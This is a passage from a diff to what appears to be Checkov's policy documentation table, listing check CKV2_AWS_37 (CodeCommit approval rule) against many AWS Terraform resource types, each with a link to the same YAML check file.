+|  704 | CKV2_AWS_37     | resource | aws_datasync_task                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  705 | CKV2_AWS_37     | resource | aws_dax_cluster                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  706 | CKV2_AWS_37     | resource | aws_dax_parameter_group                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  707 | CKV2_AWS_37     | resource | aws_dax_subnet_group                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  708 | CKV2_AWS_37     | resource | aws_db_cluster_snapshot                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  709 | CKV2_AWS_37     | resource | aws_db_event_subscription                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  710 | CKV2_AWS_37     | resource | aws_db_instance                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  711 | CKV2_AWS_37     | resource | aws_db_instance_role_association                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  712 | CKV2_AWS_37     | resource | aws_db_option_group                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  713 | CKV2_AWS_37     | resource | aws_db_parameter_group                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  714 | CKV2_AWS_37     | resource | aws_db_security_group                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  715 | CKV2_AWS_37     | resource | aws_db_snapshot                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  716 | CKV2_AWS_37     | resource | aws_db_subnet_group                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  717 | CKV2_AWS_37     | resource | aws_default_network_acl                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  718 | CKV2_AWS_37     | resource | aws_default_route_table                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  719 | CKV2_AWS_37     | resource | aws_default_security_group                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  720 | CKV2_AWS_37     | resource | aws_default_subnet                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  721 | CKV2_AWS_37     | resource | aws_default_vpc                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  722 | CKV2_AWS_37     | resource | aws_default_vpc_dhcp_options                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  723 | CKV2_AWS_37     | resource | aws_devicefarm_project                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  724 | CKV2_AWS_37     | resource | aws_directory_service_conditional_forwarder             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  725 | CKV2_AWS_37     | resource | aws_directory_service_directory                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  726 | CKV2_AWS_37     | resource | aws_directory_service_log_subscription                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  727 | CKV2_AWS_37     | resource | aws_dlm_lifecycle_policy                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  728 | CKV2_AWS_37     | resource | aws_dms_certificate                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  729 | CKV2_AWS_37     | resource | aws_dms_endpoint                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  730 | CKV2_AWS_37     | resource | aws_dms_event_subscription                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  731 | CKV2_AWS_37     | resource | aws_dms_replication_instance                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  732 | CKV2_AWS_37     | resource | aws_dms_replication_subnet_group                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  733 | CKV2_AWS_37     | resource | aws_dms_replication_task                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  734 | CKV2_AWS_37     | resource | aws_docdb_cluster                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  735 | CKV2_AWS_37     | resource | aws_docdb_cluster_instance                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  736 | CKV2_AWS_37     | resource | aws_docdb_cluster_parameter_group                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  737 | CKV2_AWS_37     | resource | aws_docdb_cluster_snapshot                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  738 | CKV2_AWS_37     | resource | aws_docdb_subnet_group                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  739 | CKV2_AWS_37     | resource | aws_dx_bgp_peer                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  740 | CKV2_AWS_37     | resource | aws_dx_connection                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  741 | CKV2_AWS_37     | resource | aws_dx_connection_association                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  742 | CKV2_AWS_37     | resource | aws_dx_gateway                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  743 | CKV2_AWS_37     | resource | aws_dx_gateway_association                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  744 | CKV2_AWS_37     | resource | aws_dx_gateway_association_proposal                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  745 | CKV2_AWS_37     | resource | aws_dx_hosted_private_virtual_interface                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  746 | CKV2_AWS_37     | resource | aws_dx_hosted_private_virtual_interface_accepter        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  747 | CKV2_AWS_37     | resource | aws_dx_hosted_public_virtual_interface                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  748 | CKV2_AWS_37     | resource | aws_dx_hosted_public_virtual_interface_accepter         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  749 | CKV2_AWS_37     | resource | aws_dx_hosted_transit_virtual_interface                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  750 | CKV2_AWS_37     | resource | aws_dx_hosted_transit_virtual_interface_accepter        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  751 | CKV2_AWS_37     | resource | aws_dx_lag                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  752 | CKV2_AWS_37     | resource | aws_dx_private_virtual_interface                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  753 | CKV2_AWS_37     | resource | aws_dx_public_virtual_interface                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  754 | CKV2_AWS_37     | resource | aws_dx_transit_virtual_interface                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  755 | CKV2_AWS_37     | resource | aws_dynamodb_global_table                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  756 | CKV2_AWS_37     | resource | aws_dynamodb_table                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  757 | CKV2_AWS_37     | resource | aws_dynamodb_table_item                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  758 | CKV2_AWS_37     | resource | aws_ebs_default_kms_key                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  759 | CKV2_AWS_37     | resource | aws_ebs_encryption_by_default                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  760 | CKV2_AWS_37     | resource | aws_ebs_snapshot                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  761 | CKV2_AWS_37     | resource | aws_ebs_snapshot_copy                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  762 | CKV2_AWS_37     | resource | aws_ebs_volume                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  763 | CKV2_AWS_37     | resource | aws_ec2_availability_zone_group                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  764 | CKV2_AWS_37     | resource | aws_ec2_capacity_reservation                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  765 | CKV2_AWS_37     | resource | aws_ec2_client_vpn_authorization_rule                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  766 | CKV2_AWS_37     | resource | aws_ec2_client_vpn_endpoint                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  767 | CKV2_AWS_37     | resource | aws_ec2_client_vpn_network_association                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  768 | CKV2_AWS_37     | resource | aws_ec2_client_vpn_route                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  769 | CKV2_AWS_37     | resource | aws_ec2_fleet                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  770 | CKV2_AWS_37     | resource | aws_ec2_local_gateway_route                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  771 | CKV2_AWS_37     | resource | aws_ec2_local_gateway_route_table_vpc_association       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  772 | CKV2_AWS_37     | resource | aws_ec2_tag                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  773 | CKV2_AWS_37     | resource | aws_ec2_traffic_mirror_filter                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  774 | CKV2_AWS_37     | resource | aws_ec2_traffic_mirror_filter_rule                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  775 | CKV2_AWS_37     | resource | aws_ec2_traffic_mirror_session                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  776 | CKV2_AWS_37     | resource | aws_ec2_traffic_mirror_target                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  777 | CKV2_AWS_37     | resource | aws_ec2_transit_gateway                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  778 | CKV2_AWS_37     | resource | aws_ec2_transit_gateway_peering_attachment              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  779 | CKV2_AWS_37     | resource | aws_ec2_transit_gateway_peering_attachment_accepter     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  780 | CKV2_AWS_37     | resource | aws_ec2_transit_gateway_route                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  781 | CKV2_AWS_37     | resource | aws_ec2_transit_gateway_route_table                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  782 | CKV2_AWS_37     | resource | aws_ec2_transit_gateway_route_table_association         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  783 | CKV2_AWS_37     | resource | aws_ec2_transit_gateway_route_table_propagation         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  784 | CKV2_AWS_37     | resource | aws_ec2_transit_gateway_vpc_attachment                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  785 | CKV2_AWS_37     | resource | aws_ec2_transit_gateway_vpc_attachment_accepter         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  786 | CKV2_AWS_37     | resource | aws_ecr_lifecycle_policy                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  787 | CKV2_AWS_37     | resource | aws_ecr_repository                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  788 | CKV2_AWS_37     | resource | aws_ecr_repository_policy                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  789 | CKV2_AWS_37     | resource | aws_ecs_capacity_provider                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  790 | CKV2_AWS_37     | resource | aws_ecs_cluster                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  791 | CKV2_AWS_37     | resource | aws_ecs_service                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  792 | CKV2_AWS_37     | resource | aws_ecs_task_definition                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  793 | CKV2_AWS_37     | resource | aws_efs_access_point                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  794 | CKV2_AWS_37     | resource | aws_efs_file_system                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  795 | CKV2_AWS_37     | resource | aws_efs_file_system_policy                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  796 | CKV2_AWS_37     | resource | aws_efs_mount_target                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
